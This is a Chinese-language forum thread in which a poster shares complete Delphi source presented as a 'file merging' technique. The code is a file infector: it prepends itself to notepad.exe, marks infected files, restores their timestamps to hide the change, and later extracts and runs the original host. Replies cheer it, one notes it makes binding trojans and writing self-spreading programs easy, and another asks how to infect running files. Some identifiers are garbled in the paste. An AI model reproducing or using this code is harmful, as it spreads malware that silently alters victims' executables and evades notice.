文件合并新思路(附完整DELPHI代码),给点掌声...(0分)

program exe2;
uses
classes,
Tlhelp32,
windows,
SysUtils;
{$R *.RES}
var
lppe:TProcessEntry32;
found:boolean;
handle:THandle;
ProcessStr,ExeName:string;
WinDirchar;
const
MySize=64000;
//根据编译或压缩后的文件大小进行修改
procedure copy2(s:string);
var
s1,s2:TMemoryStream;
files2:TFilestream;
ch:array[0..3] of char;
ss:string;
filetime,fhandle:integer;
begin
//若文件s不存在
if FileExists(s)=False then
exit;
try
//判断文件s中有没有特殊标记。若有，表示已经合并过
//在本程序编译或压缩后，用十六进制软件进行修改，在偏移200处加入标记'IMOK'
//用debug也可进行修改(对exe文件，要先更改EXE扩展名)。例:
//-e 1C8
//127D:01C8 00._ <-键入新的十六进制值
//......
//-w <-保存文件
files2:=TFilestream.Create(s,fmopenread);
files2.Position:=200;
files2.Read(ch,4);
ss:=copy(ch,1,4);
files2.Free;
if ss='IMOK' then
exit;
//将本文件与文件s合并 本文件+s=s
s2:=TMemoryStream.Create;
s2.loadfromfile(ExeName);
s1:=TMemoryStream.Create;
s1.copyfrom(s2,MySize);
s2.clear;
s2.loadfromfile(s);
s1.seek(s1.size,soFrombegin
ning);
s1.copyfrom(s2,s2.size);
s2.free;
//得到文件s的日期
fhandle:=FileOpen(s, fmOpenread);
filetime:=filegetdate(fhandle);
fileclose(fhandle);
s1.SaveToFile(s);
//恢复文件s的日期
fhandle:=FileOpen(s, fmOpenwrite);
filesetdate(fhandle,filetime);
fileclose(fhandle);
s1.free;
except end;
end;

procedure CreateFileAndRun;
var
s1,s2:TMemoryStream;
TempDirchar;
cmdstr:string;
a:integer;
begin
s1:=TMemoryStream.Create;
s1.loadfromfile(ExeName);
if s1.Size=MySize then
begin
s1.Free;
exit;
end;
s1.seek(MySize,soFrombegin
ning);
s2:=TMemoryStream.Create;
s2.copyfrom(s1,s1.Size-MySize);
GetMem(TempDir,255);
GetTempPath(255,TempDir);
s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));
cmdstr:='';
a:=1;
while ParamStr(a)<>''do
begin
cmdstr:=cmdstr+ParamStr(a)+' ';
inc(a);
end;
winexec(pchar(TempDir+'/'+ExtractFileName(ExeName)+' '+cmdstr),SW_SHOW);
freemem(TempDir);
s2.free;
s1.free;
end;

begin
GetMem(WinDir,255);
GetWindowsDirectory(WinDir,255);
ExeName:=ParamStr(0);
handle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
found:=Process32First(handle,lppe);
ProcessStr:='';
while founddo
begin
ProcessStr:=ProcessStr+lppe.szExeFile;//列出所有进程。
found:=Process32Next(handle,lppe);
end;
if pos(WinDir+'/notepad.exe',ProcessStr)=0 then
begin
copy2(WinDir+'/notepad.exe');
end;
{其它需要合并的文件
if pos(...,ProcessStr)=0 then
begin
copy2(...);
end;
...
}
freemem(WinDir);
{
你想用这个程序干点其它的什么...
}
CreateFileAndRun;//释放文件并带参数运行
end.

掌声响起来

再啪几下
[]

啪.....啪.....啪.....啪.....啪.....啪.....啪.....啪.....

[]
好

很久没有看到这么有含量的文件啊，真是太好了。谢谢了。不错，不错喔。
说着说着，掌声响就起来了：
啪啪啪啪啪啪啪啪.....
[red]（不知是给你的，还是给我的[^]）[red]

要将CreateFileAndRun中的
s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));
改为
try
s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));
except end;
以防建立文件时出错。
在这个程序的基础上，可以很容易将木马与其它程序捆在一起，
可以编写出DELPHI版的有"传染"功能的程序。

领教领教，不错不错，很好很好，掌声掌声[]

鼓励

呵呵，麻烦解释一下你的新思路新在哪？

有办法感染正在运行的文件吗？

非常好，收藏！
啪……

[8D]

thank you!

好！！！！

这个是不是jingtao的方法相同，
我想知道如果合并多个文件，该如果把他们分别解开呢。，
还有就是这种方法，在某些杀毒软件下会被抱有病毒的
请大家继续

掌声响起来，这里很精彩

hao ,
ba ba ba

pa,pa,pa,pa,pa
打你几嘴巴
不要太骄傲
清醒努力吧

被捆绑的程序能显示原来的图标吗？！